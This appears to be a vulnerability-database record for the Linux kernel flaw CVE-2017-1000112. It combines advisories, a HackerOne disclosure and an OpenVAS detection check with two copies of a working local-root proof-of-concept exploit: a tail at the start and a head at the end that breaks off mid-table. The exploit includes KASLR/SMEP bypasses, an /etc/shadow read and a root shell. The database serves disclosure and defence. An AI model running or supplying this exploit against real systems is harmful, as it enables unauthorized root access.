* * *\r\n\r\nstatic bool write_file(const char* file, const char* what, ...) {\r\n\tchar buf[1024];\r\n\tva_list args;\r\n\tva_start(args, what);\r\n\tvsnprintf(buf, sizeof(buf), what, args);\r\n\tva_end(args);\r\n\tbuf[sizeof(buf) - 1] = 0;\r\n\tint len = strlen(buf);\r\n\r\n\tint fd = open(file, O_WRONLY | O_CLOEXEC);\r\n\tif (fd == -1)\r\n\t\treturn false;\r\n\tif (write(fd, buf, len) != len) {\r\n\t\tclose(fd);\r\n\t\treturn false;\r\n\t}\r\n\tclose(fd);\r\n\treturn true;\r\n}\r\n\r\nvoid setup_sandbox() {\r\n\tint real_uid = getuid();\r\n\tint real_gid = getgid();\r\n\r\n\tif (unshare(CLONE_NEWUSER) != 0) {\r\n\t\tprintf(\"[!] unprivileged user namespaces are not available\\n\");\r\n\t\tperror(\"[-] unshare(CLONE_NEWUSER)\");\r\n\t\texit(EXIT_FAILURE);\r\n\t}\r\n\tif (unshare(CLONE_NEWNET) != 0) {\r\n\t\tperror(\"[-] unshare(CLONE_NEWUSER)\");\r\n\t\texit(EXIT_FAILURE);\r\n\t}\r\n\r\n\tif (!write_file(\"/proc/self/setgroups\", \"deny\")) {\r\n\t\tperror(\"[-] write_file(/proc/self/set_groups)\");\r\n\t\texit(EXIT_FAILURE);\r\n\t}\r\n\tif (!write_file(\"/proc/self/uid_map\", \"0 %d 1\\n\", real_uid)) {\r\n\t\tperror(\"[-] write_file(/proc/self/uid_map)\");\r\n\t\texit(EXIT_FAILURE);\r\n\t}\r\n\tif (!write_file(\"/proc/self/gid_map\", \"0 %d 1\\n\", real_gid)) {\r\n\t\tperror(\"[-] write_file(/proc/self/gid_map)\");\r\n\t\texit(EXIT_FAILURE);\r\n\t}\r\n\r\n\tcpu_set_t my_set;\r\n\tCPU_ZERO(&my_set);\r\n\tCPU_SET(0, &my_set);\r\n\tif (sched_setaffinity(0, sizeof(my_set), &my_set) != 0) {\r\n\t\tperror(\"[-] sched_setaffinity()\");\r\n\t\texit(EXIT_FAILURE);\r\n\t}\r\n\r\n\tif (system(\"/sbin/ifconfig lo mtu 1500\") != 0) {\r\n\t\tperror(\"[-] system(/sbin/ifconfig lo mtu 1500)\");\r\n\t\texit(EXIT_FAILURE);\r\n\t}\r\n\tif (system(\"/sbin/ifconfig lo up\") != 0) {\r\n\t\tperror(\"[-] system(/sbin/ifconfig lo up)\");\r\n\t\texit(EXIT_FAILURE);\r\n\t}\r\n}\r\n\r\nvoid exec_shell() {\r\n\tchar* shell = \"/bin/bash\";\r\n\tchar* args[] = {shell, \"-i\", NULL};\r\n\texecve(shell, args, NULL);\r\n}\r\n\r\nbool is_root() {\r\n\t// We can't simple check uid, since we're running inside a namespace\r\n\t// with uid set to 0. Try opening /etc/shadow instead.\r\n\tint fd = open(\"/etc/shadow\", O_RDONLY);\r\n\tif (fd == -1)\r\n\t\treturn false;\r\n\tclose(fd);\r\n\treturn true;\r\n}\r\n\r\nvoid check_root() {\r\n\tprintf(\"[.] checking if we got root\\n\");\r\n\tif (!is_root()) {\r\n\t\tprintf(\"[-] something went wrong =(\\n\");\r\n\t\treturn;\r\n\t}\r\n\tprintf(\"[+] got r00t ^_^\\n\");\r\n\texec_shell();\r\n}\r\n\r\nint main(int argc, char** argv) {\r\n\tprintf(\"[.] starting\\n\");\r\n\r\n\tprintf(\"[.] checking distro and kernel versions\\n\");\r\n\tdetect_versions();\r\n\tprintf(\"[~] done, versions looks good\\n\");\r\n\r\n\tprintf(\"[.] checking SMEP and SMAP\\n\");\r\n\tcheck_smep_smap();\r\n\tprintf(\"[~] done, looks good\\n\");\r\n\r\n\tprintf(\"[.] setting up namespace sandbox\\n\");\r\n\tsetup_sandbox();\r\n\tprintf(\"[~] done, namespace sandbox set up\\n\");\r\n\r\n#if ENABLE_KASLR_BYPASS\r\n\tprintf(\"[.] KASLR bypass enabled, getting kernel addr\\n\");\r\n\tKERNEL_BASE = get_kernel_addr();\r\n\tprintf(\"[~] done, kernel text: %lx\\n\", KERNEL_BASE);\r\n#endif\r\n\r\n\tprintf(\"[.] commit_creds: %lx\\n\", COMMIT_CREDS);\r\n\tprintf(\"[.] prepare_kernel_cred: %lx\\n\", PREPARE_KERNEL_CRED);\r\n\r\n\tunsigned long payload = (unsigned long)&get_root;\r\n\r\n#if ENABLE_SMEP_BYPASS\r\n\tprintf(\"[.] SMEP bypass enabled, mmapping fake stack\\n\");\r\n\tmmap_stack();\r\n\tpayload = XCHG_EAX_ESP_RET;\r\n\tprintf(\"[~] done, fake stack mmapped\\n\");\r\n#endif\r\n\r\n\tprintf(\"[.] executing payload %lx\\n\", payload);\r\n\toob_execute(payload);\r\n\tprintf(\"[~] done, should be root now\\n\");\r\n\r\n\tcheck_root();\r\n\r\n\treturn 0;\r\n}\n ", "sourceHref": "https://www.seebug.org/vuldb/ssvid-96343", "cvss": {"score": 6.9, "vector": "AV:LOCAL/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "hackerone": [{"lastseen": "2019-09-11T00:32:11", "bulletinFamily": "bugbounty", "bounty": 0.0, "cvelist": ["CVE-2017-1000112"], "description": "Hi!\n\n[CVE-2017-1000112](https://nvd.nist.gov/vuln/detail/CVE-2017-1000112) is a vulnerability I found in the Linux kernel caused by a UFO to non-UFO path switch for UFO packets. It can be exploited to gain kernel code execution from an unprivileged process.\n\nThis vulnerability was reported to security@kernel.org and linux-distros@ following the coordinated disclosure process and then [announced](https://www.openwall.com/lists/oss-security/2017/08/13/1) on oss-security@. The fix was [committed](https://git.kernel.org/pub/scm/linux/kernel/git/davem/net.git/commit/?id=85f1bd9a7b5a79d5baa8bf44af19658f7bf77bfa) on Aug 10, 2017.\n\nI wrote a proof-of-concept exploit for a range of Ubuntu kernels Ubuntu kernel which gains root from an unprivileged user, which can be found [here](https://github.com/xairy/kernel-exploits/tree/master/CVE-2017-1000112). More details about the vulnerability and exploitation can be found in the oss-security [announcement](https://www.openwall.com/lists/oss-security/2017/08/13/1).\n\nThe reason I'm reporting this now is that a [similar bug](https://hackerone.com/reports/347282) that I've reported a while ago has recently been triaged and addressed, so it seems that LPE Linux kernel bugs are within the scope of this IBB program.\n\nThanks!\n\n## Impact\n\nThis vulnerability allows a local attacker to elevate privileges to root on a machine with vulnerable Linux kernel version.", "modified": "2019-09-11T00:19:48", "published": "2019-08-29T14:08:01", "id": "H1:684573", "href": "https://hackerone.com/reports/684573", "type": "hackerone", "title": "The Internet: Linux kernel: CVE-2017-1000112: a memory corruption due to UFO to non-UFO path switch", "cvss": {"score": 6.9, "vector": "AV:L/AC:M/Au:N/C:C/I:C/A:C"}}], "virtuozzo": [{"lastseen": "2019-11-05T11:28:22", "bulletinFamily": "unix", "cvelist": ["CVE-2017-7895", "CVE-2017-7645"], "description": "The cumulative Virtuozzo ReadyKernel patch updated with security fixes. The patch applies to Virtuozzo kernels 3.10.0-327.36.1.vz7.18.7 (Virtuozzo 7.0.1), 3.10.0-327.36.1.vz7.20.18 (Virtuozzo 7.0.3), and 3.10.0-514.16.1.vz7.30.10 (Virtuozzo 7.0.4).\n**Vulnerability id:** CVE-2017-7645\nThe NFS2/3 RPC client could send long arguments to nfsd server. These encoded arguments are stored in an array of memory pages, and accessed via various pointer variables. Arbitrarily long arguments could make these pointers point outside the array, thus causing out-of-bounds memory access. A remote user/program could use this flaw to crash the kernel resulting in DoS.\n\n**Vulnerability id:** CVE-2017-7895\nThe NFSv2 and NFSv3 server implementations in the Linux kernel through 4.10.13 lack certain checks for the end of a buffer. A remote attacker could trigger a pointer-arithmetic error or possibly have unspecified other impact via crafted requests related to fs/nfsd/nfs3xdr.c and fs/nfsd/nfsxdr.c.\n\n**Vulnerability id:** PSBM-65826\nIf sctp module is loaded on the host, a privileged user inside a container can cause a kernel crash by triggering a NULL pointer dererefence in sctp_endpoint_destroy() function with a specially crafted sequence of system calls.\n\n**Vulnerability id:** PSBM-65345\nA privileged user inside a container can cause a kernel crash by triggering a BUG_ON in unregister_netdevice_many() function with a specially crafted sequence of system calls.\n\n", "edition": 1, "modified": "2017-05-23T00:00:00", "published": "2017-05-23T00:00:00", "id": "VZA-2017-038", "href": "https://help.virtuozzo.com/customer/portal/articles/2812513", "title": "Important kernel security update: CVE-2017-7645 and other; Virtuozzo ReadyKernel patch 21.0 for Virtuozzo 7.0.x", "type": "virtuozzo", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-11-05T11:27:45", "bulletinFamily": "unix", "cvelist": ["CVE-2017-9242", "CVE-2017-14106"], "description": "The cumulative Virtuozzo ReadyKernel patch was updated with security and stability fixes. The patch applies to Virtuozzo kernels 3.10.0-327.18.2.vz7.15.2 (Virtuozzo 7.0.0), 3.10.0-327.36.1.vz7.18.7 (Virtuozzo 7.0.1), and 3.10.0-327.36.1.vz7.20.18 (Virtuozzo 7.0.3).\n**Vulnerability id:** CVE-2017-9242\nThe __ip6_append_data function in net/ipv6/ip6_output.c in the Linux kernel through 4.11.3 is too late in checking whether an overwrite of an skb data structure may occur, which allows local users to cause a denial of service (system crash) via crafted system calls.\n\n**Vulnerability id:** CVE-2017-14106\nA divide-by-zero vulnerability was found in the __tcp_select_window function in the Linux kernel. This can result in a kernel panic causing a local denial-of-service.\n\n", "edition": 1, "modified": "2017-09-06T00:00:00", "published": "2017-09-06T00:00:00", "id": "VZA-2017-077", "href": "https://help.virtuozzo.com/customer/portal/articles/2870907", "title": "Kernel security update: CVE-2017-9242 and other; Virtuozzo ReadyKernel patch 30.3 for Virtuozzo 7.0.0, 7.0.1, and 7.0.3", "type": "virtuozzo", "cvss": {"score": 4.9, "vector": "AV:L/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2019-11-05T11:27:49", "bulletinFamily": "unix", "cvelist": ["CVE-2017-9242", "CVE-2017-14106", "CVE-2017-7558"], "description": "The cumulative Virtuozzo ReadyKernel patch was updated with security and stability fixes. The patch applies to Virtuozzo kernel 3.10.0-514.26.1.vz7.33.22 (Virtuozzo 7.0.5).\n**Vulnerability id:** CVE-2017-7558\nA kernel data leak due to an out-of-bound read was found in the Linux kernel in inet_diag_msg_sctp{,l}addr_fill() and sctp_get_sctp_info() functions present since version 4.7-rc1 through version 4.13. A data leak happens when these functions fill in sockaddr data structures used to export socket's diagnostic information. As a result, up to 100 bytes of the slab data could be leaked to a userspace.\n\n**Vulnerability id:** CVE-2017-9242\nThe __ip6_append_data function in net/ipv6/ip6_output.c in the Linux kernel through 4.11.3 is too late in checking whether an overwrite of an skb data structure may occur, which allows local users to cause a denial of service (system crash) via crafted system calls.\n\n**Vulnerability id:** CVE-2017-14106\nA divide-by-zero vulnerability was found in the __tcp_select_window function in the Linux kernel. This can result in a kernel panic causing a local denial-of-service.\n\n", "edition": 1, "modified": "2017-09-06T00:00:00", "published": "2017-09-06T00:00:00", "id": "VZA-2017-079", "href": "https://help.virtuozzo.com/customer/portal/articles/2870919", "title": "Kernel security update: CVE-2017-9242 and other; Virtuozzo ReadyKernel patch 30.3 for Virtuozzo 7.0.5", "type": "virtuozzo", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2019-11-05T11:27:50", "bulletinFamily": "unix", "cvelist": ["CVE-2017-7895", "CVE-2017-7645"], "description": "This update provides a new kernel 2.6.32-042stab123.3 for Virtuozzo 6.0. The new kernel is based on the Red Hat Enterprise Linux 6.9 kernel 2.6.32-696.el6 and provides security fixes as well as stability bug fixes.\n**Vulnerability id:** CVE-2017-7895\nThe NFSv2 and NFSv3 server implementations in the Linux kernel through 4.10.13 lack certain checks for the end of a buffer. A remote attacker could trigger a pointer-arithmetic error or possibly have unspecified other impact via crafted requests related to fs/nfsd/nfs3xdr.c and fs/nfsd/nfsxdr.c.\n\n**Vulnerability id:** CVE-2017-7645\nThe NFSv2/NFSv3 server in the nfsd subsystem in the Linux kernel through 4.10.11 allowed remote attackers to cause a denial of service (system crash) via a long RPC reply, related to net/sunrpc/svc.c, fs/nfsd/nfs3xdr.c, and fs/nfsd/nfsxdr.c.\n\n", "edition": 1, "modified": "2017-05-11T00:00:00", "published": "2017-05-11T00:00:00", "id": "VZA-2017-037", "href": "https://help.virtuozzo.com/customer/portal/articles/2803965", "title": "Kernel security update: CVE-2017-7645 and other; new kernel 2.6.32-042stab123.3, Virtuozzo 6.0 Update 12 Hotfix 9 (6.0.12-3676)", "type": "virtuozzo", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-11-05T11:27:44", "bulletinFamily": "unix", "cvelist": ["CVE-2017-9242", "CVE-2017-14106", "CVE-2017-7558"], "description": "The cumulative Virtuozzo ReadyKernel patch was updated with security and stability fixes. The patch applies to Virtuozzo kernels 3.10.0-514.16.1.vz7.30.10 (Virtuozzo 7.0.4) and 3.10.0-514.16.1.vz7.30.15 (Virtuozzo 7.0.4 HF3).\n**Vulnerability id:** CVE-2017-7558\nA kernel data leak due to an out-of-bound read was found in the Linux kernel in inet_diag_msg_sctp{,l}addr_fill() and sctp_get_sctp_info() functions present since version 4.7-rc1 through version 4.13. A data leak happens when these functions fill in sockaddr data structures used to export socket's diagnostic information. As a result, up to 100 bytes of the slab data could be leaked to a userspace.\n\n**Vulnerability id:** CVE-2017-9242\nThe __ip6_append_data function in net/ipv6/ip6_output.c in the Linux kernel through 4.11.3 is too late in checking whether an overwrite of an skb data structure may occur, which allows local users to cause a denial of service (system crash) via crafted system calls.\n\n**Vulnerability id:** CVE-2017-14106\nA divide-by-zero vulnerability was found in the __tcp_select_window function in the Linux kernel. This can result in a kernel panic causing a local denial-of-service.\n\n", "edition": 1, "modified": "2017-09-06T00:00:00", "published": "2017-09-06T00:00:00", "id": "VZA-2017-078", "href": "https://help.virtuozzo.com/customer/portal/articles/2870913", "title": "Kernel security update: CVE-2017-9242 and other; Virtuozzo ReadyKernel patch 30.3 for Virtuozzo 7.0.4 and 7.0.4 HF3", "type": "virtuozzo", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2019-11-05T11:28:16", "bulletinFamily": "unix", "cvelist": ["CVE-2017-7895", "CVE-2017-7645"], "description": "This update provides a new kernel 2.6.32-042stab123.3 for Virtuozzo Containers for Linux 4.7, Server Bare Metal 5.0. The new kernel is based on the Red Hat Enterprise Linux 6.9 kernel 2.6.32-696.el6 and provides security fixes as well as stability bug fixes.\n**Vulnerability id:** CVE-2017-7895\nThe NFSv2 and NFSv3 server implementations in the Linux kernel through 4.10.13 lack certain checks for the end of a buffer. A remote attacker could trigger a pointer-arithmetic error or possibly have unspecified other impact via crafted requests related to fs/nfsd/nfs3xdr.c and fs/nfsd/nfsxdr.c.\n\n**Vulnerability id:** CVE-2017-7645\nThe NFSv2/NFSv3 server in the nfsd subsystem in the Linux kernel through 4.10.11 allowed remote attackers to cause a denial of service (system crash) via a long RPC reply, related to net/sunrpc/svc.c, fs/nfsd/nfs3xdr.c, and fs/nfsd/nfsxdr.c.\n\n", "edition": 1, "modified": "2017-05-11T00:00:00", "published": "2017-05-11T00:00:00", "id": "VZA-2017-036", "href": "https://help.virtuozzo.com/customer/portal/articles/2803956", "title": "Kernel security update: CVE-2017-7645 and other; new kernel 2.6.32-042stab123.3 for Virtuozzo Containers for Linux 4.7, Server Bare Metal 5.0", "type": "virtuozzo", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-11-05T11:28:15", "bulletinFamily": "unix", "cvelist": ["CVE-2017-7895", "CVE-2017-9074", "CVE-2017-7645", "CVE-2017-9075", "CVE-2016-8646", "CVE-2017-9076", "CVE-2017-9077", "CVE-2017-8890"], "description": "The cumulative Virtuozzo ReadyKernel patch updated with security fixes. The patch applies to Virtuozzo kernel 3.10.0-327.18.2.vz7.15.2 (Virtuozzo 7.0.0).\n**Vulnerability id:** CVE-2017-7645\nThe NFS2/3 RPC client could send long arguments to nfsd server. These encoded arguments are stored in an array of memory pages, and accessed via various pointer variables. Arbitrarily long arguments could make these pointers point outside the array, thus causing out-of-bounds memory access. A remote user/program could use this flaw to crash the kernel resulting in DoS.\n\n**Vulnerability id:** CVE-2017-7895\nThe NFSv2 and NFSv3 server implementations in the Linux kernel through 4.10.13 lack certain checks for the end of a buffer. A remote attacker could trigger a pointer-arithmetic error or possibly have unspecified other impact via crafted requests related to fs/nfsd/nfs3xdr.c and fs/nfsd/nfsxdr.c.\n\n**Vulnerability id:** CVE-2017-9077\nThe tcp_v6_syn_recv_sock function in net/ipv6/tcp_ipv6.c in the Linux kernel mishandles inheritance, which allows local users to cause a denial of service or possibly have unspecified other impact via crafted system calls, a related issue to CVE-2017-8890. An unprivileged local user could use this flaw to induce kernel memory corruption on the system, leading to a crash. Due to the nature of the flaw, privilege escalation cannot be fully ruled out, although we believe it is unlikely.\n\n**Vulnerability id:** CVE-2017-9076\nThe IPv6 DCCP implementation in the Linux kernel mishandles inheritance, which allows local users to cause a denial of service or possibly have unspecified other impact via crafted system calls, a related issue to CVE-2017-8890. An unprivileged local user could use this flaw to induce kernel memory corruption on the system, leading to a crash. Due to the nature of the flaw, privilege escalation cannot be fully ruled out, although we believe it is unlikely.\n\n**Vulnerability id:** CVE-2017-9075\nThe sctp_v6_create_accept_sk function in net/sctp/ipv6.c in the Linux kernel mishandles inheritance, which allows local users to cause a denial of service or possibly have unspecified other impact via crafted system calls, a related issue to CVE-2017-8890. An unprivileged local user could use this flaw to induce kernel memory corruption on the system, leading to a crash. Due to the nature of the flaw, privilege escalation cannot be fully ruled out, although we believe it is unlikely.\n\n**Vulnerability id:** CVE-2017-9074\nThe IPv6 fragmentation implementation in the Linux kernel through 4.11.1 does not consider that the nexthdr field may be associated with an invalid option, which allows local users to cause a denial of service (out-of-bounds read and BUG) or possibly have unspecified other impact via crafted socket and send system calls.\n\n**Vulnerability id:** CVE-2017-8890\nThe inet_csk_clone_lock function in net/ipv4/inet_connection_sock.c in the Linux kernel allows attackers to cause a denial of service (double free) or possibly have unspecified other impact by leveraging use of the accept system call. An unprivileged local user could use this flaw to induce kernel memory corruption on the system, leading to a crash. Due to the nature of the flaw, privilege escalation cannot be fully ruled out, although we believe it is unlikely.\n\n**Vulnerability id:** CVE-2016-8646\nA vulnerability was found in the Linux kernel. An unprivileged local user could trigger oops in shash_async_export() by attempting to force the in-kernel hashing algorithms into decrypting an empty data set.\n\n**Vulnerability id:** PSBM-65826\nIf the sctp module was loaded on the host, a privileged user inside a container could cause a kernel crash by triggering a NULL pointer dererefence in the sctp_endpoint_destroy() function with a specially crafted sequence of system calls.\n\n**Vulnerability id:** PSBM-65345\nA privileged user inside a container could cause a kernel crash by triggering a BUG_ON in the unregister_netdevice_many() function with a specially crafted sequence of system calls.\n\n", "edition": 1, "modified": "2017-06-02T00:00:00", "published": "2017-06-02T00:00:00", "id": "VZA-2017-042", "href": "https://help.virtuozzo.com/customer/portal/articles/2816864", "title": "Important kernel security update: CVE-2017-7645 and other; Virtuozzo ReadyKernel patch 22.0 for Virtuozzo 7.0.0", "type": "virtuozzo", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "openvas": [{"lastseen": "2020-01-27T18:40:03", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-1000112"], "description": "The remote host is missing an update for the Huawei EulerOS\n ", "modified": "2020-01-23T00:00:00", "published": "2020-01-23T00:00:00", "id": "OPENVAS:1361412562311220171256", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562311220171256", "type": "openvas", "title": "Huawei EulerOS: Security Advisory for kernel (EulerOS-SA-2017-1256)", "sourceData": "# Copyright (C) 2020 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.1.2.2017.1256\");\n script_version(\"2020-01-23T11:01:55+0000\");\n script_cve_id(\"CVE-2017-1000112\");\n script_tag(name:\"cvss_base\", value:\"6.9\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2020-01-23 11:01:55 +0000 (Thu, 23 Jan 2020)\");\n script_tag(name:\"creation_date\", value:\"2020-01-23 11:01:55 +0000 (Thu, 23 Jan 2020)\");\n script_name(\"Huawei EulerOS: Security Advisory for kernel (EulerOS-SA-2017-1256)\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2020 Greenbone Networks GmbH\");\n script_family(\"Huawei EulerOS Local Security Checks\");\n script_dependencies(\"gb_huawei_euleros_consolidation.nasl\");\n script_mandatory_keys(\"ssh/login/euleros\", \"ssh/login/rpms\", re:\"ssh/login/release=EULEROS-2\\.0SP2\");\n\n script_xref(name:\"EulerOS-SA\", value:\"2017-1256\");\n script_xref(name:\"URL\", value:\"https://developer.huaweicloud.com/ict/en/site-euleros/euleros/security-advisories/EulerOS-SA-2017-1256\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the Huawei EulerOS\n 'kernel' package(s) announced via the EulerOS-SA-2017-1256 advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"An exploitable memory corruption flaw was found in the Linux kernel. The append path can be erroneously switched from UFO to non-UFO in ip_ufo_append_data() when building an UFO packet with MSG_MORE option. If unprivileged user namespaces are available, this flaw can be exploited to gain root privileges.CVE-2017-1000112\");\n\n script_tag(name:\"affected\", value:\"'kernel' package(s) on Huawei EulerOS V2.0SP2.\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"EULEROS-2.0SP2\") {\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel\", rpm:\"kernel~3.10.0~327.59.59.46.h27\", rls:\"EULEROS-2.0SP2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-debug\", rpm:\"kernel-debug~3.10.0~327.59.59.46.h27\", rls:\"EULEROS-2.0SP2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-debug-devel\", rpm:\"kernel-debug-devel~3.10.0~327.59.59.46.h27\", rls:\"EULEROS-2.0SP2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-debuginfo\", rpm:\"kernel-debuginfo~3.10.0~327.59.59.46.h27\", rls:\"EULEROS-2.0SP2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-debuginfo-common-x86_64\", rpm:\"kernel-debuginfo-common-x86_64~3.10.0~327.59.59.46.h27\", rls:\"EULEROS-2.0SP2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-devel\", rpm:\"kernel-devel~3.10.0~327.59.59.46.h27\", rls:\"EULEROS-2.0SP2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-headers\", rpm:\"kernel-headers~3.10.0~327.59.59.46.h27\", rls:\"EULEROS-2.0SP2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-tools\", rpm:\"kernel-tools~3.10.0~327.59.59.46.h27\", rls:\"EULEROS-2.0SP2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-tools-libs\", rpm:\"kernel-tools-libs~3.10.0~327.59.59.46.h27\", rls:\"EULEROS-2.0SP2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"perf\", rpm:\"perf~3.10.0~327.59.59.46.h27\", rls:\"EULEROS-2.0SP2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"python-perf\", rpm:\"python-perf~3.10.0~327.59.59.46.h27\", rls:\"EULEROS-2.0SP2\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if (__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);", "cvss": {"score": 6.9, "vector": "AV:L/AC:M/Au:N/C:C/I:C/A:C"}}], "exploitdb": [{"lastseen": "2019-07-26T11:22:52", "description": "", "published": "2018-12-29T00:00:00", "type": "exploitdb", "title": "Linux Kernel &lt; 4.4.0/ &lt; 4.8.0 (Ubuntu 14.04/16.04 / Linux Mint 17/18 / Zorin) - Local Privilege Escalation (KASLR / SMEP)", "bulletinFamily": "exploit", "cvelist": ["CVE-2017-1000112"], "modified": "2018-12-29T00:00:00", "id": "EDB-ID:47169", "href": "https://www.exploit-db.com/exploits/47169", "sourceData": "// A proof-of-concept local root exploit for CVE-2017-1000112.\r\n// Includes KASLR and SMEP bypasses. No SMAP bypass.\r\n// Tested on:\r\n// - Ubuntu trusty 4.4.0 kernels\r\n// - Ubuntu xenial 4.4.0 and 4.8.0 kernels\r\n// - Linux Mint rosa 4.4.0 kernels\r\n// - Linux Mint sarah 4.8.0 kernels\r\n// - Zorin OS 12.1 4.4.0-39 kernel\r\n//\r\n// Usage:\r\n// user@ubuntu:~$ uname -a\r\n// Linux ubuntu 4.8.0-58-generic #63~16.04.1-Ubuntu SMP Mon Jun 26 18:08:51 UTC 2017 x86_64 x86_64 x86_64 GNU/Linux\r\n// user@ubuntu:~$ whoami\r\n// user\r\n// user@ubuntu:~$ id\r\n// uid=1000(user) gid=1000(user) groups=1000(user),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),113(lpadmin),128(sambashare)\r\n// user@ubuntu:~$ gcc pwn.c -o pwn\r\n// user@ubuntu:~$ ./pwn \r\n// [.] starting\r\n// [.] checking kernel version\r\n// [.] kernel version '4.8.0-58-generic' detected\r\n// [~] done, version looks good\r\n// [.] checking SMEP and SMAP\r\n// [~] done, looks good\r\n// [.] setting up namespace sandbox\r\n// [~] done, namespace sandbox set up\r\n// [.] KASLR bypass enabled, getting kernel addr\r\n// [~] done, kernel text: ffffffffae400000\r\n// [.] commit_creds: ffffffffae4a5d20\r\n// [.] prepare_kernel_cred: ffffffffae4a6110\r\n// [.] SMEP bypass enabled, mmapping fake stack\r\n// [~] done, fake stack mmapped\r\n// [.] executing payload ffffffffae40008d\r\n// [~] done, should be root now\r\n// [.] checking if we got root\r\n// [+] got r00t ^_^\r\n// root@ubuntu:/home/user# whoami\r\n// root\r\n// root@ubuntu:/home/user# id\r\n// uid=0(root) gid=0(root) groups=0(root)\r\n// root@ubuntu:/home/user# cat /etc/shadow\r\n// root:!:17246:0:99999:7:::\r\n// daemon:*:17212:0:99999:7:::\r\n// bin:*:17212:0:99999:7:::\r\n// sys:*:17212:0:99999:7:::\r\n// ...\r\n//\r\n// Andrey Konovalov <andreyknvl@gmail.com>\r\n// ---\r\n// Updated by <bcoles@gmail.com>\r\n// - support for distros based on Ubuntu kernel\r\n// - additional kernel targets\r\n// - additional KASLR bypasses\r\n// https://github.com/bcoles/kernel-exploits/tree/master/CVE-2017-1000112\r\n\r\n#define _GNU_SOURCE\r\n\r\n#include <fcntl.h>\r\n#include <sched.h>\r\n#include <stdarg.h>\r\n#include <stdbool.h>\r\n#include <stdint.h>\r\n#include <stdio.h>\r\n#include <stdlib.h>\r\n#include <string.h>\r\n#include <unistd.h>\r\n\r\n#include <linux/socket.h>\r\n#include <netinet/ip.h>\r\n#include <sys/klog.h>\r\n#include <sys/mman.h>\r\n#include <sys/utsname.h>\r\n\r\n#define DEBUG\r\n\r\n#ifdef DEBUG\r\n#\tdefine dprintf printf\r\n#else\r\n#\tdefine dprintf\r\n#endif\r\n\r\n#define ENABLE_KASLR_BYPASS\t\t1\r\n#define ENABLE_SMEP_BYPASS\t\t1\r\n\r\nchar* SHELL = \"/bin/bash\";\r\n\r\n// Will be overwritten if ENABLE_KASLR_BYPASS is enabled.\r\nunsigned long KERNEL_BASE =\t\t0xffffffff81000000ul;\r\n\r\n// Will be overwritten by detect_kernel().\r\nint kernel = -1;\r\n\r\nstruct kernel_info {\r\n\tconst char* distro;\r\n\tconst char* version;\r\n\tuint64_t commit_creds;\r\n\tuint64_t prepare_kernel_cred;\r\n\tuint64_t xchg_eax_esp_ret;\r\n\tuint64_t pop_rdi_ret;\r\n\tuint64_t mov_dword_ptr_rdi_eax_ret;\r\n\tuint64_t mov_rax_cr4_ret;\r\n\tuint64_t neg_rax_ret;\r\n\tuint64_t pop_rcx_ret;\r\n\tuint64_t or_rax_rcx_ret;\r\n\tuint64_t xchg_eax_edi_ret;\r\n\tuint64_t mov_cr4_rdi_ret;\r\n\tuint64_t jmp_rcx;\r\n};\r\n\r\nstruct kernel_info kernels[] = {\r\n\t{ \"trusty\", \"4.4.0-21-generic\", 0x9d7a0, 